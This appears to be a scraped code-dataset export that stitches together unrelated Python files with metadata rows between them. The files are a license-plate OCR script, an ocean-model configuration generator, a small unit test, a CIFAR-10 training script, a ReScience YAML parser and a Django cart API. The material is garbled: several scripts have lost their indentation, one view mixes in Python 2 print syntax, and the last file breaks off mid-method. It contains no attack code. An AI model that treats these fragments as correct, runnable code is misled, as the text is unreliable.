SCALAR_BLACK = (0.0, 0.0, 0.0)
SCALAR_WHITE = (255.0, 255.0, 255.0)
SCALAR_YELLOW = (0.0, 255.0, 255.0)
SCALAR_GREEN = (0.0, 255.0, 0.0)
SCALAR_RED = (0.0, 0.0, 255.0)
showSteps = False
###################################################################################################
def main(filename):
    """Detect and read the license plate in the image at *filename*.

    Returns the recognised plate characters as a string, or the string
    "not found" when training fails, the image cannot be read, or no
    plate / no characters are detected.

    Fixes over the original: the bare ``except:`` previously relied on a
    NameError (``licPlate`` unbound when no plates were found) to reach
    the "not found" fallback, and the KNN-failure / bad-image / no-chars
    paths returned ``None`` instead of "not found".
    """
    try:
        # Train the KNN character classifier before any recognition.
        if DetectChars.loadKNNDataAndTrainKNN() == False:
            print("\nerror: KNN traning was not successful\n")
            return "not found"

        imgOriginalScene = cv2.imread(filename)
        if imgOriginalScene is None:
            print("\nerror: image not read from file \n\n")
            os.system("pause")  # let the user see the error on Windows
            return "not found"

        listOfPossiblePlates = DetectPlates.detectPlatesInScene(imgOriginalScene)
        listOfPossiblePlates = DetectChars.detectCharsInPlates(listOfPossiblePlates)

        if len(listOfPossiblePlates) == 0:
            print("\nno license plates were detected\n")
            return "not found"

        # Assume the plate with the most recognised characters is the real
        # one: sort descending by character count and take the first.
        listOfPossiblePlates.sort(key=lambda possiblePlate: len(possiblePlate.strChars), reverse=True)
        licPlate = listOfPossiblePlates[0]

        if len(licPlate.strChars) == 0:
            print("\nno characters were detected\n\n")
            return "not found"

        drawRedRectangleAroundPlate(imgOriginalScene, licPlate)
        print("\nlicense plate read from image = " + licPlate.strChars + "\n")
        print("----------------------------------------")
        writeLicensePlateCharsOnImage(imgOriginalScene, licPlate)

        cv2.waitKey(0)  # hold any open windows until a key is pressed
        return str(licPlate.strChars)
    except Exception:
        # Any OpenCV / pipeline failure maps to the generic fallback value
        # the batch driver writes to the spreadsheet.
        return "not found"
###################################################################################################
def drawRedRectangleAroundPlate(imgOriginalScene, licPlate):
    """Draw a red rotated rectangle around the detected plate, in place.

    The plate location is a rotated rect; its four corner vertices are
    joined by red line segments directly on the scene image.
    """
    corners = cv2.boxPoints(licPlate.rrLocationOfPlateInScene)
    # Connect each corner to the next (wrapping 3 -> 0) with a red line.
    for idx in range(4):
        start_pt = tuple(corners[idx])
        end_pt = tuple(corners[(idx + 1) % 4])
        cv2.line(imgOriginalScene, start_pt, end_pt, SCALAR_RED, 2)
###################################################################################################
def writeLicensePlateCharsOnImage(imgOriginalScene, licPlate):
    """Write the recognised plate characters onto the scene image, in place.

    The text is centered horizontally on the plate, placed below the plate
    when the plate sits in the upper 3/4 of the image (above it otherwise),
    and scaled relative to the plate height.
    """
    ptCenterOfTextAreaX = 0                             # this will be the center of the area the text will be written to
    ptCenterOfTextAreaY = 0
    ptLowerLeftTextOriginX = 0                          # this will be the bottom left of the area that the text will be written to
    ptLowerLeftTextOriginY = 0
    sceneHeight, sceneWidth, sceneNumChannels = imgOriginalScene.shape
    plateHeight, plateWidth, plateNumChannels = licPlate.imgPlate.shape
    intFontFace = cv2.FONT_HERSHEY_SIMPLEX                      # choose a plain jane font
    fltFontScale = float(plateHeight) / 30.0                    # base font scale on height of plate area
    intFontThickness = int(round(fltFontScale * 1.5))           # base font thickness on font scale
    textSize, baseline = cv2.getTextSize(licPlate.strChars, intFontFace, fltFontScale, intFontThickness)        # call getTextSize
    # unpack rotated rect into center point, width and height, and angle
    ( (intPlateCenterX, intPlateCenterY), (intPlateWidth, intPlateHeight), fltCorrectionAngleInDeg ) = licPlate.rrLocationOfPlateInScene
    intPlateCenterX = int(intPlateCenterX)              # make sure center is an integer
    intPlateCenterY = int(intPlateCenterY)
    ptCenterOfTextAreaX = int(intPlateCenterX)          # the horizontal location of the text area is the same as the plate
    if intPlateCenterY < (sceneHeight * 0.75):                                                  # if the license plate is in the upper 3/4 of the image
        ptCenterOfTextAreaY = int(round(intPlateCenterY)) + int(round(plateHeight * 1.6))       # write the chars in below the plate
    else:                                                                                       # else if the license plate is in the lower 1/4 of the image
        ptCenterOfTextAreaY = int(round(intPlateCenterY)) - int(round(plateHeight * 1.6))       # write the chars in above the plate
    # end if
    textSizeWidth, textSizeHeight = textSize                # unpack text size width and height
    ptLowerLeftTextOriginX = int(ptCenterOfTextAreaX - (textSizeWidth / 2))         # calculate the lower left origin of the text area
    ptLowerLeftTextOriginY = int(ptCenterOfTextAreaY + (textSizeHeight / 2))        # based on the text area center, width, and height
    # write the text on the image
    cv2.putText(imgOriginalScene, licPlate.strChars, (ptLowerLeftTextOriginX, ptLowerLeftTextOriginY), intFontFace, fltFontScale, SCALAR_YELLOW, intFontThickness)
# end function
###################################################################################################
if __name__ == "__main__":
count=0
imagelist=os.listdir("input")
for img in imagelist:
print(img)
number=(main(f"input/{img}"))
count=count+1
sheet1.write(count, 0, number)
sheet1.write(count, 1, img)
wbr.save("numberplate.xls")
| 41.864865
| 162
| 0.577534
|
4a07bf6a724e005ab50605c7ba553ecde8b4ac50
| 6,850
|
py
|
Python
|
forcing/dot_in/cas6_v3_lo8b/make_dot_in.py
|
parkermac/LiveOcean
|
bef3e1e729ada1069853dd4f57f79f452b54f4fa
|
[
"MIT"
] | 4
|
2015-06-09T18:53:11.000Z
|
2021-08-19T01:39:38.000Z
|
forcing/dot_in/cas6_v3_lo8b/make_dot_in.py
|
parkermac/LiveOcean
|
bef3e1e729ada1069853dd4f57f79f452b54f4fa
|
[
"MIT"
] | null | null | null |
forcing/dot_in/cas6_v3_lo8b/make_dot_in.py
|
parkermac/LiveOcean
|
bef3e1e729ada1069853dd4f57f79f452b54f4fa
|
[
"MIT"
] | 1
|
2017-03-07T01:28:49.000Z
|
2017-03-07T01:28:49.000Z
|
"""
This creates and poulates directories for ROMS runs on gaggle. It is
designed to work with the "BLANK" version of the .in file,
replacing things like $whatever$ with meaningful values.
"""
import os
import sys
fpth = os.path.abspath('../../')
if fpth not in sys.path:
sys.path.append(fpth)
import forcing_functions as ffun
Ldir, Lfun = ffun.intro()
#import netCDF4 as nc
#import numpy as np
from datetime import datetime, timedelta
fdt = datetime.strptime(Ldir['date_string'], '%Y.%m.%d')
fdt_yesterday = fdt - timedelta(1)
print('- dot_in.py creating files for LiveOcean for ' + Ldir['date_string'])
gtag = Ldir['gtag']
gtagex = gtag + '_' + Ldir['ex_name']
EX_NAME = Ldir['ex_name'].upper()
#### USER DEFINED VALUES ####
# which ROMS code to use
roms_name = 'LO_ROMS'
# account for differences when using biology
do_bio = True
multi_core = True # use more than one core
if Ldir['run_type'] == 'backfill':
days_to_run = 1.0
elif Ldir['run_type'] == 'forecast':
days_to_run = float(Ldir['forecast_days'])
# time step in seconds (should fit evenly into 3600 sec)
if Ldir['blow_ups'] == 0:
dtsec = 40 # was 40 2018/08/11
elif Ldir['blow_ups'] == 1:
dtsec = 30
elif Ldir['blow_ups'] == 2:
dtsec = 25
elif Ldir['blow_ups'] == 3:
dtsec = 20
elif Ldir['blow_ups'] == 4:
dtsec = 15
elif Ldir['blow_ups'] == 5:
dtsec = 10
else:
print('Unsupported number of blow ups: %d' % (Ldir['blow_ups']))
ndtfast = 20
restart_nrrec = '-1' # '-1' for a non-crash restart file, otherwise '1' or '2'
his_interval = 3600 # seconds to define and write to history files
rst_interval = 10 # days between writing to the restart file (e.g. 5)
# which forcings to look for
atm_dir = 'atm1/' # which atm forcing files to use
ocn_dir = 'ocn4/' # which ocn forcing files to use
riv_dir = 'riv2/' # which riv forcing files to use
tide_dir = 'tide2/' # which tide forcing files to use
#### END USER DEFINED VALUES ####
# DERIVED VALUES
if multi_core:
if Ldir['np_num'] == 64: # for new mox nodes 2*32=64 2019_02
ntilei = '8' # number of tiles in I-direction
ntilej = '8' # number of tiles in J-direction
elif Ldir['np_num'] == 72:
ntilei = '6' # number of tiles in I-direction
ntilej = '12' # number of tiles in J-direction
elif Ldir['np_num'] == 112:
ntilei = '8' # number of tiles in I-direction
ntilej = '14' # number of tiles in J-direction
elif Ldir['np_num'] == 144:
ntilei = '8' # number of tiles in I-direction
ntilej = '18' # number of tiles in J-direction
elif Ldir['np_num'] == 196:
ntilei = '14' # number of tiles in I-direction
ntilej = '14' # number of tiles in J-direction
elif Ldir['np_num'] == 392:
ntilei = '14' # number of tiles in I-direction
ntilej = '28' # number of tiles in J-direction
elif Ldir['np_num'] == 588:
ntilei = '21' # number of tiles in I-direction
ntilej = '28' # number of tiles in J-direction
else:
print('Unsupported number of processors: %d' % (Ldir['np_num']))
else:
ntilei = '1'
ntilej = '1'
# if np.mod(3600,dtsec) != 0:
# print('** WARNING: dtsec does not fit evenly into 1 hour **')
if dtsec == int(dtsec):
dt = str(dtsec) + '.0d0' # a string version of dtsec, for the .in file
else:
dt = str(dtsec) + 'd0' # a string version of dtsec, for the .in file
ninfo = int(his_interval/dtsec) # how often to write info to the log file (# of time steps)
nhis = int(his_interval/dtsec) # how often to write to the history files
ndefhis = int(nhis) # how often to create new history files
nrst = int(rst_interval*86400/dtsec)
ntimes = int(days_to_run*86400/dtsec)
# file location stuff
date_string = Ldir['date_string']
date_string_yesterday = fdt_yesterday.strftime('%Y.%m.%d')
dstart = str(int(Lfun.datetime_to_modtime(fdt) / 86400.))
f_string = 'f' + date_string
f_string_yesterday = 'f'+ date_string_yesterday
# where forcing files live (fjord, as seen from gaggle)
# NOTE: eventually this should not be hard-wired.
lo_dir = Ldir['parent'] + 'LiveOcean/'
loo_dir = Ldir['parent'] + 'LiveOcean_output/'
grid_dir = Ldir['parent'] + 'LiveOcean_data/grids/' + Ldir['gridname'] + '/'
force_dir = loo_dir + gtag + '/' + f_string + '/'
roms_dir = Ldir['parent'] + 'LiveOcean_roms/'
# determine grid size
# gfn = grid_dir + 'grid.nc'
# ds = nc.Dataset(gfn)
# h = ds['h'][:]
# nrows0, ncols0 = h.shape
# nrows = nrows0 - 2
# ncols = ncols0 - 2
#ds.close()
# hardwired because we don't have netCDF4
nrows = 1302 - 2
ncols = 663 - 2
# determine number of layers
s_dict = Lfun.csv_to_dict(grid_dir + 'S_COORDINATE_INFO.csv')
nlayers = str(s_dict['N'])
if do_bio:
bio_tag = ''
else:
bio_tag = ''
# the .in file
dot_in_name = 'liveocean.in' # name of the .in file
dot_in_dir00 = Ldir['roms'] + 'output/'
Lfun.make_dir(dot_in_dir00) # make sure it exists
dot_in_dir0 = Ldir['roms'] + 'output/' + gtagex + '/'
Lfun.make_dir(dot_in_dir0) # make sure it exists
dot_in_dir = dot_in_dir0 + f_string +'/'
Lfun.make_dir(dot_in_dir, clean=True) # make sure it exists and is empty
# where to put the output files according to the .in file
out_dir0 = roms_dir + 'output/' + gtagex + '/'
out_dir = out_dir0 + f_string + '/'
if Ldir['start_type'] == 'continuation':
nrrec = '0' # '-1' for a hot restart
#ininame = 'ocean_rst.nc' # for a hot perfect restart
ininame = 'ocean_his_0025.nc' # for a hot restart
ini_fullname = out_dir0 + f_string_yesterday + '/' + ininame
elif Ldir['start_type'] == 'new':
nrrec = '0' # '0' for a history or ini file
ininame = 'ocean_ini' + bio_tag + '.nc' # could be an ini or history file
ini_fullname = force_dir + ocn_dir + ininame
# END DERIVED VALUES
## create .in ##########################
f = open('BLANK.in','r')
f2 = open(dot_in_dir + dot_in_name,'w')
in_varlist = ['base_dir','ntilei','ntilej','ntimes','dt','nrrec','ninfo',
'nhis','dstart','ndefhis','nrst','force_dir','grid_dir','roms_dir',
'atm_dir','ocn_dir','riv_dir','tide_dir','dot_in_dir',
'ini_fullname','out_dir','EX_NAME','roms_name','bio_tag',
'nrows','ncols', 'nlayers', 'ndtfast']
for line in f:
for var in in_varlist:
if '$'+var+'$' in line:
line2 = line.replace('$'+var+'$', str(eval(var)))
line = line2
else:
line2 = line
f2.write(line2)
f.close()
f2.close()
## npzd2o_Banas.in ###########
f = open('npzd2o_Banas_BLANK.in','r')
bio_dot_in_name = 'npzd2o_Banas.in'
f3 = open(dot_in_dir + bio_dot_in_name,'w')
in_varlist = ['force_dir','riv_dir','bio_tag']
for line in f:
for var in in_varlist:
if '$'+var+'$' in line:
line2 = line.replace('$'+var+'$', str(eval(var)))
line = line2
else:
line2 = line
f3.write(line2)
f.close()
f3.close()
| 32.159624
| 91
| 0.644088
|
4a07c1195a6f004b79e20eb89b6ddb058d73cf4b
| 370
|
py
|
Python
|
libunittest/test_tile.py
|
Shathra/puzzlib
|
98c63e69cb6c3de0aa3167a8834c224f7f25f6a7
|
[
"BSD-2-Clause"
] | 1
|
2016-06-19T04:25:35.000Z
|
2016-06-19T04:25:35.000Z
|
libunittest/test_tile.py
|
Shathra/puzzlib
|
98c63e69cb6c3de0aa3167a8834c224f7f25f6a7
|
[
"BSD-2-Clause"
] | null | null | null |
libunittest/test_tile.py
|
Shathra/puzzlib
|
98c63e69cb6c3de0aa3167a8834c224f7f25f6a7
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
from puzz import *
class TestTile(unittest.TestCase):
    """Unit tests for the Tile class."""

    def test_const(self):
        # A default-constructed tile reports the class-wide default value.
        default_tile = Tile()
        self.assertEqual(default_tile.get_value(), Tile.DEFAULT_VALUE)
        # An explicit constructor argument becomes the tile's value.
        valued_tile = Tile(5)
        self.assertEqual(valued_tile.get_value(), 5)

    def test_set_get(self):
        # set_value overwrites the current value each time it is called.
        tile = Tile()
        for expected in (3, 4):
            tile.set_value(expected)
            self.assertEqual(tile.get_value(), expected)
| 18.5
| 54
| 0.678378
|
4a07c16e567ad2f4cf041a00a0a2539edb2409ea
| 3,978
|
py
|
Python
|
supervised_cifar10.py
|
luyuzhe111/simsiam
|
ced608e8e9ff51f431f52d7da10d25e68b516b79
|
[
"MIT"
] | 3
|
2021-05-25T08:35:55.000Z
|
2021-08-02T02:26:06.000Z
|
supervised_cifar10.py
|
luyuzhe111/simsiam
|
ced608e8e9ff51f431f52d7da10d25e68b516b79
|
[
"MIT"
] | null | null | null |
supervised_cifar10.py
|
luyuzhe111/simsiam
|
ced608e8e9ff51f431f52d7da10d25e68b516b79
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torchvision
import torchvision.transforms as transforms
import os
import argparse
from models.backbones.resnet import resnet50
# Command-line interface: only the initial learning rate is configurable.
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--lr', default=0.01, type=float, help='learning rate')
args = parser.parse_args()

device = 'cuda' if torch.cuda.is_available() else 'cpu'
best_acc = 0  # best test accuracy seen so far (updated by test())
start_epoch = 0  # start from epoch 0 or last checkpoint epoch

# Data
print('==> Preparing data..')
# Both splits use the same pipeline: tensor conversion plus per-channel
# normalisation with the constants written below; no augmentation.
transform_train = transforms.Compose([
    transforms.ToTensor(),
    transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])

transform_test = transforms.Compose([
    transforms.ToTensor(),
    transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])

# Downloads CIFAR-10 into ./data on first run (network side effect).
trainset = torchvision.datasets.CIFAR10(
    root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(
    trainset, batch_size=64, shuffle=True, num_workers=2)

testset = torchvision.datasets.CIFAR10(
    root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(
    testset, batch_size=64, shuffle=False, num_workers=2)

classes = ('plane', 'car', 'bird', 'cat', 'deer',
           'dog', 'frog', 'horse', 'ship', 'truck')

# Model
print('==> Building model..')
# Project resnet50 backbone: keep only the first three layers of its head
# and attach a fresh 10-way linear classifier.
net = resnet50()
net.head = net.head[:3]  # NOTE(review): assumes net.head is sliceable (nn.Sequential) — confirm
net.fc = nn.Linear(2048, 10)
net = net.to(device)
if device == 'cuda':
    net = torch.nn.DataParallel(net)
    cudnn.benchmark = True  # let cuDNN autotune kernels for fixed input sizes

criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=args.lr,
                      momentum=0.9, weight_decay=5e-4)
# Cosine decay over the full 200-epoch run.
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=200)
def train(epoch):
    """Run one training epoch over the CIFAR-10 training set.

    Prints the running loss and accuracy after every batch. Relies on the
    module-level ``net``, ``trainloader``, ``criterion``, ``optimizer`` and
    ``device`` globals defined at import time.

    Args:
        epoch: Current epoch index (used only for logging).
    """
    print('\nEpoch: %d' % epoch)
    net.train()
    train_loss = 0
    correct = 0
    total = 0
    # Hoisted out of the batch loop: nn.Upsample is stateless, so building it
    # once per epoch avoids a needless allocation per batch. Scale factor 7
    # enlarges the 32x32 CIFAR images to match the backbone's expected input.
    upsampler = nn.Upsample(scale_factor=7)
    for batch_idx, (inputs, targets) in enumerate(trainloader):
        inputs = upsampler(inputs)
        inputs, targets = inputs.to(device), targets.to(device)
        optimizer.zero_grad()
        outputs = net(inputs)
        loss = criterion(outputs, targets)
        loss.backward()
        optimizer.step()

        train_loss += loss.item()
        _, predicted = outputs.max(1)
        total += targets.size(0)
        correct += predicted.eq(targets).sum().item()

        print(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
              % (train_loss/(batch_idx+1), 100.*correct/total, correct, total))
def test(epoch):
    """Evaluate on the CIFAR-10 test set and checkpoint on improvement.

    Updates the module-level ``best_acc`` and writes ./checkpoint/ckpt.pth
    whenever this epoch's accuracy beats the best seen so far. Relies on the
    module-level ``net``, ``testloader``, ``criterion`` and ``device``.

    Args:
        epoch: Current epoch index (stored inside the checkpoint).
    """
    global best_acc
    net.eval()
    test_loss = 0
    correct = 0
    total = 0
    # Hoisted out of the batch loop: nn.Upsample is stateless, so one
    # instance per call suffices (mirrors the fix in train()).
    upsampler = nn.Upsample(scale_factor=7)
    with torch.no_grad():
        for batch_idx, (inputs, targets) in enumerate(testloader):
            inputs, targets = inputs.to(device), targets.to(device)
            inputs = upsampler(inputs)
            outputs = net(inputs)
            loss = criterion(outputs, targets)

            test_loss += loss.item()
            _, predicted = outputs.max(1)
            total += targets.size(0)
            correct += predicted.eq(targets).sum().item()

            print(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
                  % (test_loss/(batch_idx+1), 100.*correct/total, correct, total))

    # Save checkpoint when accuracy improves.
    acc = 100.*correct/total
    if acc > best_acc:
        print('Saving..')
        state = {
            'net': net.state_dict(),
            'acc': acc,
            'epoch': epoch,
        }
        # makedirs(exist_ok=True) replaces the racy isdir()/mkdir() pair.
        os.makedirs('checkpoint', exist_ok=True)
        torch.save(state, './checkpoint/ckpt.pth')
        best_acc = acc
# Main loop: train and evaluate for 200 epochs, stepping the cosine
# learning-rate schedule once per epoch.
for epoch in range(start_epoch, start_epoch+200):
    train(epoch)
    test(epoch)
    scheduler.step()
| 30.366412
| 89
| 0.632227
|
4a07c2c03c68b56f0a4584f9d3842daa680dfd09
| 10,069
|
py
|
Python
|
report/article.py
|
RaphaelaHeil/Variational-Sparse-Coding
|
8c90d91d1e8f0d2c2534b02c580365d2e96cc812
|
[
"MIT"
] | 48
|
2018-11-01T22:04:27.000Z
|
2021-12-08T12:16:03.000Z
|
report/article.py
|
RaphaelaHeil/Variational-Sparse-Coding
|
8c90d91d1e8f0d2c2534b02c580365d2e96cc812
|
[
"MIT"
] | 3
|
2019-12-05T04:27:27.000Z
|
2020-05-22T02:46:55.000Z
|
report/article.py
|
RaphaelaHeil/Variational-Sparse-Coding
|
8c90d91d1e8f0d2c2534b02c580365d2e96cc812
|
[
"MIT"
] | 5
|
2019-01-07T19:16:12.000Z
|
2021-06-02T14:52:12.000Z
|
# ReScience yaml parser
# Released under the BSD two-clauses licence
import yaml
class Contributor:
    """A person associated with the article (author, editor or reviewer).

    Derives convenience name forms (last name, abbreviated initials) from
    the raw name string, which may be given either as "Last, First Middle"
    or "First Middle Last".
    """

    def __init__(self, role, name, orcid="", email="", affiliations=None):
        """Store contributor data and pre-compute name variants.

        Args:
            role: One of "author", "editor" or "reviewer".
            name: Full name, "Last, First" or "First Last" style.
            orcid: Optional ORCID identifier.
            email: Optional contact e-mail address.
            affiliations: Optional list of affiliation codes.
        """
        self.role = role
        self.name = name
        self.fullname = name
        self.lastname = self.get_lastname(name)
        self.abbrvname = self.get_abbrvname(name)
        self.orcid = orcid
        self.email = email
        # BUG FIX: the original signature used a mutable default ([]) that
        # was shared by every Contributor built without explicit
        # affiliations, so a mutation on one instance leaked into all.
        self.affiliations = affiliations if affiliations is not None else []

    def get_abbrvname(self, name):
        """Return *name* with initialled first names, e.g. "N.P. Rougier"."""
        if not name: return ""
        # Split into family name and given names for both supported formats.
        if ',' in name:
            lastname = name.split(",")[0]
            firstnames = name.split(",")[1].strip().split(" ")
        else:
            lastname = name.split(" ")[-1]
            firstnames = name.split(" ")[:-1]
        abbrvname = ""
        for firstname in firstnames:
            if "-" in firstname:
                # Hyphenated given names keep the hyphen between initials,
                # e.g. "Jean-Luc" -> "J.-L.". ("part" replaces the original
                # loop variable, which shadowed the "name" parameter.)
                for part in firstname.split("-"):
                    abbrvname += part[0].strip().upper() + '.-'
                abbrvname = abbrvname[:-1]  # drop the trailing '-'
            else:
                abbrvname += firstname[0].strip().upper() + '.'
        return abbrvname + " " + lastname

    def get_lastname(self, name):
        """Return the family-name part of *name* (either name format)."""
        if not name: return ""
        # "Rougier, Nicolas P." style
        if ',' in name:
            return name.split(",")[0].strip()
        # "Nicolas P. Rougier" style
        return name.split(" ")[-1]
class Affiliation:
    """An institution a contributor belongs to, keyed by a short code."""

    def __init__(self, code, name, address=""):
        # Plain value holder: store the three fields verbatim.
        self.code, self.name, self.address = code, name, address
class Repository:
    """A named source repository (code or data) with URL and DOI."""

    def __init__(self, name, url, doi):
        # Plain value holder: store the three fields verbatim.
        self.name, self.url, self.doi = name, url, doi
class Replication:
    """Citation details of the original work being replicated."""

    def __init__(self, cite, bib, url, doi):
        # Plain value holder: store the four fields verbatim.
        self.cite, self.bib = cite, bib
        self.url, self.doi = url, doi
class Review:
    """Link to the public review thread (URL and DOI)."""

    def __init__(self, url, doi):
        # Plain value holder: store both fields verbatim.
        self.url, self.doi = url, doi
class Date:
    """A publication-related date parsed from free-form text.

    Uses python-dateutil when available; on any parse or import failure it
    falls back to the current date with an empty textual representation.
    """

    def __init__(self, date):
        """Parse *date* (a string) into date/year/month/day/textual fields."""
        try:
            # Imported lazily so the rest of the module works without
            # python-dateutil installed.
            import dateutil.parser
            date = dateutil.parser.parse(date)
            self.date = date
            self.year = date.year
            self.month = date.month
            self.day = date.day
            self.textual = self.date.strftime("%d %B %Y")
        except Exception:
            # BUG FIX: narrowed from a bare ``except:`` so KeyboardInterrupt
            # and SystemExit are no longer swallowed; any ImportError or
            # parse error still triggers the "now" fallback below.
            import datetime
            now = datetime.datetime.now()
            self.date = now
            self.year = now.year
            self.month = now.month
            self.day = now.day
            self.textual = ""  # signals "date unknown" to templates

    def __str__(self):
        return self.textual

    def __repr__(self):
        return self.textual
class Article:
    """In-memory representation of a ReScience article's YAML metadata.

    Parses the YAML document and exposes title, contributors, repositories,
    dates and journal information as attributes, plus three pre-rendered
    author-list strings (full names / abbreviated initials / family names).
    """

    def __init__(self, data):
        """Parse *data* (a YAML string) and populate all attributes."""
        self.title = ""
        # BUG FIX: was misspelled ``self.absract``; parse() always assigned
        # ``self.abstract``, leaving the misspelled attribute dead.
        self.abstract = ""
        self.type = ""
        self.domain = ""
        self.language = ""
        self.bibliography = ""
        self.keywords = []
        self.authors = []
        self.editors = []
        self.reviewers = []
        self.affiliations = []
        self.code = ""
        self.data = ""
        self.contact = ""
        self.review = ""
        self.replication = ""
        self.date_received = ""
        self.date_accepted = ""
        self.date_published = ""
        self.journal_name = ""
        self.journal_issn = ""
        self.journal_volume = ""
        self.journal_issue = ""
        self.article_number = ""
        self.article_doi = ""
        self.article_url = ""
        self.parse(data)

        # Build the three author-list renderings.
        self.authors_short = ""  # Family names only
        self.authors_abbrv = ""  # Abbreviated firstnames + family names
        self.authors_full = ""   # Full names
        n = len(self.authors)
        if n > 3:
            # Long author lists collapse to "First-author et al."
            self.authors_short = self.authors[0].lastname + " et al."
            self.authors_abbrv = self.authors[0].abbrvname + " et al."
            self.authors_full = self.authors[0].fullname + " et al."
        elif n == 1:
            self.authors_short += self.authors[0].lastname
            self.authors_abbrv += self.authors[0].abbrvname
            self.authors_full += self.authors[0].fullname
        else:
            # 0, 2 or 3 authors: comma-separate all but the last two,
            # which are joined with " and ".
            for i in range(n - 2):
                self.authors_short += self.authors[i].lastname + ", "
                self.authors_abbrv += self.authors[i].abbrvname + ", "
                self.authors_full += self.authors[i].fullname + ", "
            if n >= 2:
                self.authors_short += self.authors[n - 2].lastname + " and "
                self.authors_short += self.authors[n - 1].lastname
                self.authors_abbrv += self.authors[n - 2].abbrvname + " and "
                self.authors_abbrv += self.authors[n - 1].abbrvname
                self.authors_full += self.authors[n - 2].fullname + " and "
                self.authors_full += self.authors[n - 1].fullname

    def parse(self, data):
        """Populate all attributes from the YAML document in *data*.

        Raises:
            IndexError: if the mandatory code repository entry is missing.
        """
        # BUG FIX: ``yaml.load`` without an explicit Loader is deprecated
        # since PyYAML 5.1 and unsafe on untrusted input; the metadata uses
        # only plain YAML, so safe_load suffices.
        document = yaml.safe_load(data)
        self.title = document.get("title", "")
        self.abstract = document.get("abstract", "") or ""
        self.keywords = document["keywords"] or ""
        self.type = document["type"] or ""
        self.domain = document["domain"] or ""
        self.language = document["language"] or ""
        self.bibliography = document["bibliography"] or ""

        # Miscellaneous dates: each list item is a one-key mapping, merged
        # here into a single dict.
        dates = {key: value for data in document["dates"]
                 for key, value in data.items()}
        self.date_received = Date(dates["received"] or "")
        self.date_accepted = Date(dates["accepted"] or "")
        self.date_published = Date(dates["published"] or "")

        # Add authors
        for item in document["authors"]:
            role = "author"
            name = item["name"] or ""
            orcid = item.get("orcid", "") or ""
            email = item.get("email", "") or ""
            # NOTE(review): an author whose "affiliations" field is null is
            # silently skipped here — confirm this is intended.
            if item["affiliations"] is not None:
                affiliations = item["affiliations"].split(",")
                if "*" in affiliations:
                    # "*" marks the corresponding author.
                    affiliations.remove("*")
                    author = Contributor(role, name, orcid, email,
                                         affiliations)
                    self.add_contributor(author)
                    self.contact = author
                else:
                    author = Contributor(role, name, orcid, email,
                                         affiliations)
                    self.add_contributor(author)

        # Add author affiliations
        for item in document["affiliations"]:
            self.affiliations.append(
                Affiliation(item["code"],
                            item["name"],
                            item.get("address", "")))

        # Add editor & reviewers
        for item in document["contributors"]:
            role = item["role"]
            name = item["name"] or ""
            orcid = item.get("orcid", "") or ""
            contributor = Contributor(role, name, orcid)
            self.add_contributor(contributor)

        # Code repository (mandatory)
        if "code" in document.keys():
            code = {key: value for data in document["code"]
                    for key, value in data.items()}
            self.code = Repository("code",
                                   code.get("url", "") or "",
                                   code.get("doi", "") or "")
        else:
            raise IndexError("Code repository not found")

        # Data repository (optional)
        if "data" in document.keys():
            data = {key: value for data in document["data"]
                    for key, value in data.items()}
            self.data = Repository("data",
                                   data.get("url", "") or "",
                                   data.get("doi", "") or "")
        else:
            self.data = Repository("data", "", "")

        # Review
        review = {key: value for review in document["review"]
                  for key, value in review.items()}
        self.review = Review(review.get("url", "") or "",
                             review.get("doi", "") or "")

        # Replication
        replication = {key: value for replication in document["replication"]
                       for key, value in replication.items()}
        self.replication = Replication(replication["cite"] or "",
                                       replication["bib"] or "",
                                       replication["url"] or "",
                                       replication["doi"] or "")

        # Article number & DOI
        article = {key: value for article in document["article"]
                   for key, value in article.items()}
        self.article_number = article["number"] or ""
        self.article_doi = article["doi"] or ""
        self.article_url = article["url"] or ""

        # Journal volume and issue
        journal = {key: value for journal in document["journal"]
                   for key, value in journal.items()}
        self.journal_name = str(journal.get("name", ""))
        self.journal_issn = str(journal.get("issn", ""))
        self.journal_volume = journal["volume"] or ""
        self.journal_issue = journal["issue"] or ""

    def add_contributor(self, contributor):
        """File *contributor* under authors/editors/reviewers by role.

        Raises:
            IndexError: for an unknown role string.
        """
        if contributor.role == "author":
            self.authors.append(contributor)
        elif contributor.role == "editor":
            self.editors.append(contributor)
        elif contributor.role == "reviewer":
            self.reviewers.append(contributor)
        else:
            raise IndexError
# -----------------------------------------------------------------------------
if __name__ == '__main__':
    # Smoke test: parse the local metadata file and print the three
    # author-list renderings (full, abbreviated initials, family names).
    with open("metadata.yaml") as file:
        article = Article(file.read())
        print(article.authors_full)
        print(article.authors_abbrv)
        print(article.authors_short)
| 34.482877
| 80
| 0.500844
|
4a07c42037d9b9b9b66be958efb165302f00935b
| 1,112
|
py
|
Python
|
chhotu/orders/apis.py
|
roshan007/chhout.web.backend
|
a952a53d908fb0c648b8b7279130166c2054f502
|
[
"MIT"
] | null | null | null |
chhotu/orders/apis.py
|
roshan007/chhout.web.backend
|
a952a53d908fb0c648b8b7279130166c2054f502
|
[
"MIT"
] | null | null | null |
chhotu/orders/apis.py
|
roshan007/chhout.web.backend
|
a952a53d908fb0c648b8b7279130166c2054f502
|
[
"MIT"
] | null | null | null |
from rest_framework import generics, response, status
from .models import Cart
from .serializers import CartSerializer
class AddToCart(generics.ListCreateAPIView):
"""
api to support adding products to cart
"""
model = Cart
serializer_class = CartSerializer
def get_queryset(self):
print self.request.META
if self.request.user.is_authenticated():
return self.model.objects.filter(user=self.request.user)
else:
return self.model.objects.filter(pid=self.request.META.get('urcpid', None), uid=self.request.META.get('gpduid'))
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
return response.Response(serializer.data, status=status.HTTP_201_CREATED)
def perform_create(self, serializer):
